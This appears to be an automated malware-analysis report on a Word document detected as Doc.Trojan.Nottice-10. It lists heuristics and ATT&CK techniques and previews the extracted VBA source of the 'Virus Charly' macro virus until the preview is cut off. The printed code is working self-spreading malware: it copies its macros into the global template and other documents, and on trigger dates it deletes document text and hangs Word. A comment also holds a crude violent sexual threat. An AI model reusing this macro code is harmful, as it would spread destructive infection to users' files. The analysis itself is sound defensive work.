MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. The VBA script explicitly attempts to copy macros like 'CHARLYTO' and 'KILLER' to the global template and other documents, suggesting an intent to spread and establish persistence. The ClamAV detection as 'Doc.Trojan.Nottice-10' further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Nottice-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nottice-10
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18427 bytes |
SHA-256: 593ced1fd5202fa694d170a9aa7273531e4f31fe57d547dc9d93793fad8f853d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN() 'VIRUS CHARLY Versión 2.1 Copyright Lima - Perú 1998. Charly Corp.
Attribute MAIN.VB_Description = "F%\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Project.AutoClose.MAIN"
'Fué creado el 1 de Dic. de 1998 por CharlySoft. Está protegido por las leyes del derecho de autor;cualquier
'intento de copia sera sancionada drásticamente.Al infractor se le obligara a colocarse de rodillas frente
'a su verdugo(En este caso, YO)para luego ser destrozado con un potente ORGANO SEXUAL EN SU MAXIMA ERECCIÓN
' ------------> Je Je Je Je...
Dim cjt$
On Error GoTo -1: On Error GoTo SALIDA
WordBasic.DisableAutoMacros 0
cjt$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If cjt$ = "normal.dot" Then
If INFECTA = 1 Then
GoTo SALIDA
Else
InfectaDOC
End If
Else
InfectaGlobal
End If
SALIDA:
WordBasic.Call "CHARLYTO"
End Sub
Private Function INFECTA()
Dim i
INFECTA = 0
If WordBasic.CountMacros(1) > 0 Then
For i = 1 To WordBasic.CountMacros(1)
If WordBasic.[MacroName$](i, 1) = "CHARLYTO" Then INFECTA = 1
Next i
End If
End Function
Private Sub InfectaDOC()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:CHARLYTO", WordBasic.[FileName$]() + ":CHARLYTO"
WordBasic.MacroCopy "Global:HerramMacro", WordBasic.[FileName$]() + ":HerramMacro"
WordBasic.MacroCopy "Global:KILLER", WordBasic.[FileName$]() + ":KILLER"
WordBasic.FileSaveAll 1, 1
End Sub
Private Sub InfectaGlobal()
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":CHARLYTO", "Global:CHARLYTO"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":HerramMacro", "Global:HerramMacro"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":KILLER", "Global:KILLER"
WordBasic.FileSaveAll 1, 0
End Sub
Attribute VB_Name = "CHARLYTO"
Dim Texto As String
Public Sub MAIN()
Attribute MAIN.VB_Description = "Macro creada el 01/12/98 por mi%\r\n"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Project.CHARLYTO.MAIN"
If WordBasic.Day(WordBasic.Now()) = 23 And WordBasic.Month(WordBasic.Now()) = 5 Then
Texto = "FELIZ CUMPLEAŃOS CHARLY": FORMATO
WordBasic.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
WordBasic.Call "KILLER"
INFINITO:
GoTo INFINITO
ElseIf WordBasic.Day(WordBasic.Now()) = 19 And WordBasic.Month(WordBasic.Now()) = 5 Then
Texto = "FELICIDADES POR TU CUMPLEAŃOS MINI": FORMATO
WordBasic.Insert "En Homenaje a mi Querida Hermanita. "
WordBasic.FormatFont Points:="24", Color:=2: WordBasic.Insert ": "
WordBasic.FormatFont Points:="18", Color:=6: WordBasic.Insert ")"
WordBasic.InsertPara: WordBasic.InsertPara
WordBasic.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
WordBasic.Call "KILLER"
GoTo INFINITO
End If '***FECHAS ESPECIALES***
If WordBasic.Day(WordBasic.Now()) = 1 Or WordBasic.Day(WordBasic.Now()) = 4 _
Or WordBasic.Day(WordBasic.Now()) = 11 Or WordBasic.Day(WordBasic.Now()) = 13 _
Or WordBasic.Day(WordBasic.Now()) = 17 Or WordBasic.Day(WordBasic.Now()) = 31 _
Or (WordBasic.Day(WordBasic.Now()) = 25 And WordBasic.Month(WordBasic.Now()) = 12) Then
If WordBasic.Day(WordBasic.Now()) = 25 And WordBasic.Month(WordBasic.Now()) = 12 Then
Texto = "FELIZ NAVIDAD .... Je Je Je": FORMATO
WordBasic.Insert "Les Desea C.J.T.A."
End If
Texto = " ***Lima - Perú (VIRUS CHARLY)***": FORMATO
EMAIL
WordBasic.Call "KILLER"
GoTo INFINITO
End If
End Sub
Private Sub FORMATO()
WordBasic.EditSelectAll: Selection.Delete
WordBasic.ToggleFull: WordBasic.Font "Busorama MD BT": WordBasic.FontSize 20
WordBasic.CenterPara: WordBasic.Inse
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.